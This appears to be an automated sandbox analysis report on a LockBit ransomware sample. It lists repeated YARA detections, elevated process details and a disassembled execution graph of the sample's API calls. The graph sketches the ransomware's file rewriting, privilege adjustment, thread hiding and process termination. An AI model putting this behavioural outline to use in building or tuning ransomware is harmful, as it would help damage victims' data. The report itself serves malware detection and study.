                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.355809240.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.297053381.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.342792742.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.297339726.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.288893518.0000000000924000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.338577636.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.344627619.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.290384683.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.288820564.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.292773780.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.348526028.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.343688307.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.295686753.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.254877922.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.275275739.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.277459542.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.349738262.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.364671102.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Ransomware_Lockbit_369e1e94, Description: unknown, Source: 00000000.00000000.248892998.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.266960225.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.296073080.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.357822715.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.297244017.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.358376789.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.295915804.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.349954584.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.347985240.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.296243931.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.339800839.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.338961168.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.345821296.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.356924452.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.341659519.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.340390512.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.349010228.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.352887510.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Ransomware_Lockbit_369e1e94, Description: unknown, Source: 00000000.00000003.283525117.000000000095A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.354065902.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.356070832.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.296331093.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.276958059.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.342520610.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.345646676.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.293997975.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294487135.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.338263030.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346958591.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.350111910.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.268784054.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.346029516.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.283585341.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Ransomware_Lockbit_369e1e94, Description: unknown, Source: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.341313974.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.291244110.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.356415227.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.268594041.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.291024022.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.280740158.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294963306.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.350997571.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.344832880.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.295145848.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.272680797.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.290242001.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.278740085.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000002.517676076.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.294366302.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LockBit_ransomware, Description: Yara detected LockBit ransomware, Source: 00000000.00000003.344311203.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                General

                Target ID:15
                Start time:02:44:51
                Start date:28/10/2022
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0x7ff6bb120000
                File size:130560 bytes
                MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:18.3%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:15.5%
                  Total number of Nodes:1939
                  Total number of Limit Nodes:15
                  execution_graph 11436 d07e5a 11443 d07e30 11436->11443 11437 d07e42 NtQuerySystemInformation 11437->11443 11438 d0684c RtlFreeHeap 11438->11443 11439 d06868 RtlReAllocateHeap 11439->11443 11440 d0684c RtlFreeHeap 11441 d07f10 Sleep 11440->11441 11441->11443 11442 d06830 RtlAllocateHeap 11442->11443 11443->11437 11443->11438 11443->11439 11443->11440 11443->11442 11331 d0969d 11332 d0967f 11331->11332 11333 d09705 11332->11333 11334 d0684c RtlFreeHeap 11332->11334 11334->11333 11114 d130c4 11115 d130db 11114->11115 11116 d12a54 4 API calls 11115->11116 11117 d1312a 11115->11117 11116->11117 11351 d0e38c 11355 d0e34f 11351->11355 11352 d0e321 SetFileAttributesW CreateFileW 11354 d0e367 11352->11354 11352->11355 11353 d0dda4 5 API calls 11353->11355 11355->11352 11355->11353 11355->11354 11444 d0f84c 11446 d0f82e 11444->11446 11445 d06830 RtlAllocateHeap 11445->11446 11446->11445 11448 d0f84a 11446->11448 11447 d0f96e 11448->11447 11449 d06830 RtlAllocateHeap 11448->11449 11449->11448 11118 d13fcc 11123 d14010 11118->11123 11119 d1443e 11120 d1444c 11119->11120 11122 d0684c RtlFreeHeap 11119->11122 11124 d1445a 11120->11124 11125 d0684c RtlFreeHeap 11120->11125 11121 d0684c RtlFreeHeap 11121->11119 11122->11120 11126 d06db0 RtlAllocateHeap 11123->11126 11129 d1402e 11123->11129 11125->11124 11127 d140e2 11126->11127 11128 d06830 RtlAllocateHeap 11127->11128 11127->11129 11128->11129 11129->11119 11129->11121 11356 d0ef8e 11363 d0ef57 11356->11363 11357 d0ef43 MoveFileExW 11358 d0ef55 11357->11358 11357->11363 11359 d0efad CreateFileW 11358->11359 11372 d0efd1 11358->11372 11360 d0efd6 11359->11360 11359->11372 11369 d0ec8c 2 API calls 11360->11369 11361 d0f0a9 11365 d0684c RtlFreeHeap 11361->11365 11362 d0ef90 11367 d0684c RtlFreeHeap 11362->11367 11363->11357 11363->11358 11363->11362 11366 d0684c RtlFreeHeap 11363->11366 11370 d0ec40 RtlAllocateHeap 11363->11370 11364 d0684c RtlFreeHeap 11364->11361 11368 d0f0b1 11365->11368 11366->11363 11367->11358 11371 d0efeb 11369->11371 11370->11363 11371->11372 11373 d0efff CreateIoCompletionPort 11371->11373 11372->11361 11372->11364 11374 d0f016 11373->11374 11376 d0f038 11373->11376 11375 d0684c RtlFreeHeap 11374->11375 11375->11372 11376->11372 11377 d0684c RtlFreeHeap 11376->11377 11377->11372 11450 d0dd4e 11453 d0dd3a 11450->11453 11451 d0dd4c 11452 d0dd99 11451->11452 11454 d0684c RtlFreeHeap 11451->11454 11453->11451 11455 d0daec NtTerminateProcess 11453->11455 11456 d0dbbc NtTerminateProcess 11453->11456 11454->11452 11455->11453 11456->11453 11130 d0a9f0 11132 d0aa13 11130->11132 11131 d0aaff 11132->11131 11133 d06830 RtlAllocateHeap 11132->11133 11134 d0aad3 11133->11134 11134->11131 11135 d0684c RtlFreeHeap 11134->11135 11135->11131 11136 d0def0 11143 d0ddeb 11136->11143 11137 d0de3e 11138 d0de4d ReadFile 11138->11143 11139 d0e006 WriteFile 11139->11143 11140 d0e0ac NtClose 11140->11143 11141 d0684c RtlFreeHeap 11141->11143 11142 d0df8d WriteFile 11142->11143 11143->11137 11143->11138 11143->11139 11143->11140 11143->11141 11143->11142 11378 d174b2 11388 d17487 11378->11388 11379 d17580 11381 d11fb8 15 API calls 11379->11381 11380 d1758d 11382 d17593 11380->11382 11383 d175a2 11380->11383 11384 d17588 11381->11384 11385 d09b80 3 API calls 11382->11385 11386 d175b2 11383->11386 11387 d175a8 11383->11387 11389 d17598 11385->11389 11391 d175d1 11386->11391 11392 d175b8 11386->11392 11390 d17308 4 API calls 11387->11390 11388->11379 11388->11380 11395 d11e50 114 API calls 11389->11395 11390->11384 11393 d175e1 11391->11393 11394 d175d7 11391->11394 11396 d16efc 5 API calls 11392->11396 11399 d17634 11393->11399 11400 d175e7 11393->11400 11398 d13868 5 API calls 11394->11398 11395->11384 11397 d175bd 11396->11397 11401 d16b18 2 API calls 11397->11401 11398->11384 11402 d17643 11399->11402 11403 d1763a 11399->11403 11404 d17616 11400->11404 11408 d16d04 2 API calls 11400->11408 11401->11384 11406 d0a308 2 API calls 11402->11406 11405 d16b18 2 API calls 11403->11405 11404->11384 11409 d10410 2 API calls 11404->11409 11405->11384 11407 d17654 11406->11407 11410 d17678 11407->11410 11412 d0a308 2 API calls 11407->11412 11408->11404 11409->11384 11410->11384 11411 d12384 11 API calls 11410->11411 11411->11384 11413 d17667 11412->11413 11413->11410 11414 d1766c 11413->11414 11415 d09b80 3 API calls 11414->11415 11416 d17671 11415->11416 11417 d16f90 114 API calls 11416->11417 11417->11384 11457 d07e73 11464 d07e30 11457->11464 11458 d07e42 NtQuerySystemInformation 11458->11464 11459 d0684c RtlFreeHeap 11459->11464 11460 d06868 RtlReAllocateHeap 11460->11464 11461 d0684c RtlFreeHeap 11462 d07f10 Sleep 11461->11462 11462->11464 11463 d06830 RtlAllocateHeap 11463->11464 11464->11458 11464->11459 11464->11460 11464->11461 11464->11463 11560 d08f36 11561 d08f38 RtlAdjustPrivilege 11560->11561 11562 d097a8 4 API calls 11561->11562 11563 d08f70 11562->11563 11564 d09850 NtClose 11563->11564 11565 d08fe0 11563->11565 11567 d08f7e 11564->11567 11566 d09005 11565->11566 11568 d08e9c 4 API calls 11565->11568 11567->11565 11569 d08f87 NtSetInformationThread 11567->11569 11568->11566 11569->11565 11570 d08f9b 11569->11570 11571 d08d78 6 API calls 11570->11571 11572 d08fb0 11571->11572 11572->11565 11573 d09850 NtClose 11572->11573 11574 d08fbe 11573->11574 11574->11565 11575 d08bb0 2 API calls 11574->11575 11575->11565 11576 d0fe37 11589 d0fcae 11576->11589 11577 d0684c RtlFreeHeap 11577->11589 11578 d069a8 RtlAllocateHeap 11578->11589 11579 d0ff37 11582 d0ff45 11579->11582 11583 d0684c RtlFreeHeap 11579->11583 11580 d0fecd 11580->11579 11581 d0684c RtlFreeHeap 11580->11581 11581->11579 11584 d0ff53 11582->11584 11586 d0684c RtlFreeHeap 11582->11586 11583->11582 11585 d0f4f8 NtSetInformationThread NtClose 11585->11589 11586->11584 11587 d0f634 NtSetInformationThread NtClose 11587->11589 11588 d0b390 2 API calls 11588->11589 11589->11577 11589->11578 11589->11580 11589->11585 11589->11587 11589->11588 11590 d0ac38 11591 d0ac20 11590->11591 11592 d0ac53 11591->11592 11593 d06868 RtlReAllocateHeap 11591->11593 11597 d0ac36 11591->11597 11594 d0684c RtlFreeHeap 11592->11594 11593->11591 11594->11597 11595 d0684c RtlFreeHeap 11596 d0ad80 11595->11596 11597->11595 11176 d077fa 11177 d077fc CoInitialize 11176->11177 11178 d07831 11177->11178 11465 d1017c 11479 d10079 11465->11479 11466 d101e9 11467 d0684c RtlFreeHeap 11466->11467 11469 d101f7 11466->11469 11467->11469 11468 d069a8 RtlAllocateHeap 11468->11479 11470 d1026f 11469->11470 11471 d0684c RtlFreeHeap 11469->11471 11472 d1027d 11470->11472 11474 d0684c RtlFreeHeap 11470->11474 11471->11470 11473 d1028b 11472->11473 11475 d0684c RtlFreeHeap 11472->11475 11474->11472 11475->11473 11476 d0f634 NtSetInformationThread NtClose 11476->11479 11477 d0b390 2 API calls 11477->11479 11478 d0684c RtlFreeHeap 11478->11479 11479->11466 11479->11468 11479->11476 11479->11477 11479->11478 11188 d097e1 11191 d097e3 11188->11191 11189 d097c9 NtQuerySystemInformation 11190 d097df 11189->11190 11189->11191 11195 d0684c RtlFreeHeap 11190->11195 11191->11189 11192 d097fc 11191->11192 11194 d06868 RtlReAllocateHeap 11191->11194 11193 d0684c RtlFreeHeap 11192->11193 11193->11190 11194->11191 11196 d09842 11195->11196 11598 d0b624 11599 d0b671 11598->11599 11600 d0b676 11599->11600 11601 d0b678 RtlAdjustPrivilege 11599->11601 11601->11599 11197 d0d7e6 11198 d0d7e8 11197->11198 11217 d0cc60 11198->11217 11201 d0ce38 RtlAllocateHeap 11203 d0d827 11201->11203 11202 d0d928 11205 d0684c RtlFreeHeap 11202->11205 11207 d0d936 11202->11207 11211 d06db0 RtlAllocateHeap 11203->11211 11212 d0d81d 11203->11212 11204 d0684c RtlFreeHeap 11204->11202 11205->11207 11206 d0d944 11209 d0d952 11206->11209 11210 d0684c RtlFreeHeap 11206->11210 11207->11206 11208 d0684c RtlFreeHeap 11207->11208 11208->11206 11210->11209 11213 d0d87d 11211->11213 11212->11202 11212->11204 11213->11212 11214 d06830 RtlAllocateHeap 11213->11214 11215 d0d8d0 11214->11215 11215->11212 11216 d0cf28 2 API calls 11215->11216 11216->11212 11218 d06db0 RtlAllocateHeap 11217->11218 11219 d0ccb2 11218->11219 11251 d0ccbb 11219->11251 11252 d0c5b4 11219->11252 11222 d0cdcc 11225 d0cdda 11222->11225 11228 d0684c RtlFreeHeap 11222->11228 11224 d0684c RtlFreeHeap 11224->11222 11226 d0cde8 11225->11226 11229 d0684c RtlFreeHeap 11225->11229 11230 d0cdf6 11226->11230 11232 d0684c RtlFreeHeap 11226->11232 11228->11225 11229->11226 11233 d0ce04 11230->11233 11235 d0684c RtlFreeHeap 11230->11235 11231 d0c820 2 API calls 11234 d0ccd5 11231->11234 11232->11230 11237 d0ce12 11233->11237 11239 d0684c RtlFreeHeap 11233->11239 11287 d0c884 11234->11287 11235->11233 11240 d0ce20 11237->11240 11241 d0684c RtlFreeHeap 11237->11241 11238 d0ccdd 11292 d0ca7c 11238->11292 11239->11237 11242 d0ce2e 11240->11242 11243 d0684c RtlFreeHeap 11240->11243 11241->11240 11242->11201 11242->11212 11243->11242 11247 d0ccf5 11248 d06830 RtlAllocateHeap 11247->11248 11249 d0cd75 11248->11249 11250 d06868 RtlReAllocateHeap 11249->11250 11249->11251 11250->11251 11251->11222 11251->11224 11253 d0a458 6 API calls 11252->11253 11254 d0c5e8 11253->11254 11255 d0c5ee 11254->11255 11256 d06830 RtlAllocateHeap 11254->11256 11258 d0c78e 11255->11258 11260 d0684c RtlFreeHeap 11255->11260 11257 d0c600 11256->11257 11257->11255 11263 d0a458 6 API calls 11257->11263 11259 d0c79c 11258->11259 11261 d0684c RtlFreeHeap 11258->11261 11262 d0c7aa 11259->11262 11264 d0684c RtlFreeHeap 11259->11264 11260->11258 11261->11259 11278 d0c7b4 11262->11278 11265 d0c61d 11263->11265 11264->11262 11265->11255 11266 d06db0 RtlAllocateHeap 11265->11266 11267 d0c632 11266->11267 11267->11255 11268 d06db0 RtlAllocateHeap 11267->11268 11269 d0c64a 11268->11269 11269->11255 11270 d06830 RtlAllocateHeap 11269->11270 11271 d0c67b 11270->11271 11271->11255 11272 d06830 RtlAllocateHeap 11271->11272 11276 d0c6a4 11272->11276 11273 d0a190 6 API calls 11273->11276 11275 d0c75b 11277 d06868 RtlReAllocateHeap 11275->11277 11276->11255 11276->11273 11276->11275 11299 d0a51c 11276->11299 11277->11255 11303 d0a0d8 11278->11303 11281 d06830 RtlAllocateHeap 11282 d0c7e9 11281->11282 11283 d0a0d8 2 API calls 11282->11283 11286 d0c810 11282->11286 11284 d0c804 11283->11284 11285 d0684c RtlFreeHeap 11284->11285 11284->11286 11285->11286 11286->11231 11288 d06c60 RtlFreeHeap 11287->11288 11289 d0c8ad 11288->11289 11290 d06830 RtlAllocateHeap 11289->11290 11291 d0c8b1 11289->11291 11290->11291 11291->11238 11293 d0cb37 11292->11293 11294 d06830 RtlAllocateHeap 11293->11294 11295 d0cbe4 11293->11295 11294->11295 11296 d0cc10 11295->11296 11297 d06830 RtlAllocateHeap 11296->11297 11298 d0cc22 11297->11298 11298->11247 11300 d0a55f 11299->11300 11301 d0b390 2 API calls 11300->11301 11302 d0a579 11300->11302 11301->11302 11302->11276 11304 d0a10f 11303->11304 11305 d0b390 2 API calls 11304->11305 11306 d0a129 11304->11306 11305->11306 11306->11281 11602 d0dd26 11605 d0dcdd 11602->11605 11603 d0dd4c 11606 d0dd99 11603->11606 11608 d0684c RtlFreeHeap 11603->11608 11604 d0dcf9 11604->11603 11609 d0daec NtTerminateProcess 11604->11609 11610 d0dbbc NtTerminateProcess 11604->11610 11605->11604 11607 d06868 RtlReAllocateHeap 11605->11607 11607->11605 11608->11606 11609->11604 11610->11604 11307 d05ee8 11311 d05dd3 11307->11311 11308 d05ddb 11309 d05afc 3 API calls 11310 d05deb RtlAllocateHeap 11309->11310 11310->11311 11311->11307 11311->11308 11311->11309 11312 d0d7e8 11313 d0cc60 13 API calls 11312->11313 11314 d0d814 11313->11314 11315 d0d81d 11314->11315 11316 d0ce38 RtlAllocateHeap 11314->11316 11317 d0d928 11315->11317 11318 d0684c RtlFreeHeap 11315->11318 11324 d0d827 11316->11324 11319 d0d936 11317->11319 11320 d0684c RtlFreeHeap 11317->11320 11318->11317 11321 d0d944 11319->11321 11322 d0684c RtlFreeHeap 11319->11322 11320->11319 11323 d0d952 11321->11323 11325 d0684c RtlFreeHeap 11321->11325 11322->11321 11324->11315 11326 d06db0 RtlAllocateHeap 11324->11326 11325->11323 11327 d0d87d 11326->11327 11327->11315 11328 d06830 RtlAllocateHeap 11327->11328 11329 d0d8d0 11328->11329 11329->11315 11330 d0cf28 2 API calls 11329->11330 11330->11315 9281 d1946f 9282 d19480 9281->9282 9290 d0639c 9282->9290 9284 d1948f 9337 d09960 9284->9337 9286 d1949a 9376 d173b4 9286->9376 9421 d05afc 9290->9421 9293 d063b6 RtlCreateHeap 9294 d063d1 9293->9294 9336 d0653c 9293->9336 9295 d05afc 3 API calls 9294->9295 9296 d063e1 9295->9296 9296->9336 9429 d05db0 9296->9429 9299 d05db0 8 API calls 9300 d0640d 9299->9300 9301 d05db0 8 API calls 9300->9301 9302 d0641e 9301->9302 9303 d05db0 8 API calls 9302->9303 9304 d0642f 9303->9304 9305 d05db0 8 API calls 9304->9305 9306 d06440 9305->9306 9307 d05db0 8 API calls 9306->9307 9308 d06451 9307->9308 9309 d05db0 8 API calls 9308->9309 9310 d06462 9309->9310 9311 d05db0 8 API calls 9310->9311 9312 d06473 9311->9312 9313 d05db0 8 API calls 9312->9313 9314 d06484 9313->9314 9315 d05db0 8 API calls 9314->9315 9316 d06495 9315->9316 9317 d05db0 8 API calls 9316->9317 9318 d064a6 9317->9318 9319 d05db0 8 API calls 9318->9319 9320 d064b7 9319->9320 9321 d05db0 8 API calls 9320->9321 9322 d064c8 9321->9322 9323 d05db0 8 API calls 9322->9323 9324 d064d9 9323->9324 9325 d05db0 8 API calls 9324->9325 9326 d064ea 9325->9326 9327 d05db0 8 API calls 9326->9327 9328 d064fb 9327->9328 9329 d05db0 8 API calls 9328->9329 9330 d0650c 9329->9330 9331 d05db0 8 API calls 9330->9331 9332 d0651d 9331->9332 9333 d05db0 8 API calls 9332->9333 9334 d0652e 9333->9334 9435 d17694 9334->9435 9336->9284 9338 d09965 9337->9338 9478 d06f10 9338->9478 9340 d099a7 9511 d06d08 9340->9511 9342 d099b6 9344 d099c4 9342->9344 9514 d0bacc 9342->9514 9343 d0996a 9343->9340 9572 d0b458 9343->9572 9344->9286 9347 d099d0 9517 d0b664 9347->9517 9355 d099e3 9375 d09a6f 9355->9375 9530 d0b17c 9355->9530 9357 d09aae 9544 d0c354 9357->9544 9358 d099f9 9358->9355 9584 d0ae44 9358->9584 9363 d0b5d0 NtQueryInformationToken 9367 d09a9c 9363->9367 9367->9357 9607 d13144 9367->9607 9368 d09a41 9370 d0684c RtlFreeHeap 9368->9370 9368->9375 9371 d09a59 9370->9371 9372 d0684c RtlFreeHeap 9371->9372 9373 d09a64 9372->9373 9374 d0684c RtlFreeHeap 9373->9374 9374->9375 9375->9357 9375->9363 9377 d173de 9376->9377 9378 d173ff 9377->9378 9382 d173f4 34 API calls 9377->9382 9385 d1740e 9377->9385 9671 d09b80 9378->9671 9383 d17580 9740 d11fb8 9383->9740 9384 d1758d 9387 d17593 9384->9387 9388 d175a2 9384->9388 9385->9383 9385->9384 9389 d09b80 3 API calls 9387->9389 9390 d175b2 9388->9390 9391 d175a8 9388->9391 9392 d17598 9389->9392 9394 d175d1 9390->9394 9395 d175b8 9390->9395 9820 d17308 9391->9820 9791 d11e50 9392->9791 9396 d175e1 9394->9396 9397 d175d7 9394->9397 9831 d16efc 9395->9831 9402 d17634 9396->9402 9403 d175e7 9396->9403 9858 d13868 